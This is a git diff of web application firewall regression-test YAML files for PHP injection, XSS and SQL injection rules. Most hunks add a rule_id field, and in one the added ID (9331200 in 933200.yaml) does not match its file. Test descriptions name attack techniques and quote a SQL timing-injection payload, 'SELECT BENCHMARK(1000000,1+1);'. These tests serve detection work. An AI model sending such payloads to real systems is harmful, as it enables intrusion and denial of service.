+1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933150 tests: - test_id: 1 desc: phpinfo diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index ad9c14489..06ebd3a85 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, ssigwart, azurit" +rule_id: 933151 tests: - test_id: 1 desc: "pmf + chain" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 86ef8941b..8c561628e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" +rule_id: 933160 tests: - test_id: 1 desc: | diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index e277b6468..fe5ac6247 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933161 tests: - test_id: 1 desc: regexp; must run test in PL3! diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 0464e98c4..0587a2cd0 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933170 tests: - test_id: 1 desc: PHP object injection diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 0c2a9e839..ba6621baf 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -1,6 +1,7 @@ --- meta: author: "NiceYouKnow, azurit" +rule_id: 933190 tests: - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index de7a6248d..83a1a3e77 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -1,6 +1,7 @@ --- meta: author: "NiceYouKnow, azurit" +rule_id: 9331200 tests: - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 1ca8f74c9..46415eef9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Walter Hop, azurit" +rule_id: 941120 tests: - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml index 724283088..b6725448e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941230 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index 3778f0162..6bd84e2c9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941240 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml index 9dbc15bcb..6033163b5 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941250 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index 176876cdf..1cc0cb1dd 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941260 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index bd09168ad..dec041596 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941270 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index b1239a7a0..8d2fa94a2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941280 tests: - test_id: 1 desc: "IE XSS Filters" @@ -25,7 +26,7 @@ tests: dest_addr: 127.0.0.1 headers: Host: localhost - Content-Length: 113 + Content-Length: "113" User-Agent: "OWASP CRS test agent" Content-Type: application/x-www-form-urlencoded Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml index d1b0a149e..c10eff63a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941290 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 679fa5e6e..14f42f240 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941300 tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index f725188c4..65c280f54 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941320 tests: - test_id: 1 desc: "XSS Attack - HTML Tag Handler" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml index a5509fd74..3b360ff29 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941330 tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 61dcf4817..b75576c73 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 941340 tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index ad7f1ed67..b94241cfa 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian Folini, azurit" +rule_id: 941360 tests: - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 91fb0cd18..ca9246a0a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,6 +1,7 @@ --- meta: author: "Andrea Menin, azurit" +rule_id: 941370 tests: - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index be8d0234b..5b4a9f5f3 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Buehler, azurit" +rule_id: 941380 tests: - test_id: 1 desc: "AngularJS client side template injection detection" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index 61cd7bd18..0de1e929e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" +rule_id: 941390 tests: - test_id: 1 desc: "JavaScript method setInterval(code, 1)" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ee9939f62..12cc969e8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -1,6 +1,7 @@ --- meta: author: "Andrea Menin, azurit" +rule_id: 941400 tests: - test_id: 1 desc: "JavaScript function without parentheses" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 8d126d024..39094ed08 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,8 +1,8 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" +rule_id: 942120 tests: - - test_id: 1 - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 9c237d09a..c4d4e9983 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" +rule_id: 942130 tests: - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index ffb58f6d1..421fedd10 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" +rule_id: 942140 tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index 3b3cfe354..511fd3e00 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" +rule_id: 942160 tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6144f707b..44ce44bdd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 942170 tests: - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 769080342..8b96a08c5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 942180 tests: - test_id: 1 desc: "basic SQL authentication bypass" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml index 41ae47c46..fed1116d6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" +rule_id: 942190 tests: - test_id: 1 desc: "MSSQL code execution and information gathering attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml index e8daad8cb..0415f2901 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" +rule_id: 942200 tests: - test_id: 1 desc: "comment-/space-obfuscated injections and backtick termination" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml index c9fdd4047..969cb4116 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 942220 tests: - test_id: 1 desc: "Integer overflow taken from skipfish" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml index f77654ff0..30d7bf3ad 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" +rule_id: 942230 tests: - test_id: 1 desc: "conditional SQL injection attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml index 19fcf99aa..5e6aba9b7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" +rule_id: 942240 tests: - test_id: 1 desc: "Detects MySQL charset switch and MSSQL DoS attempts"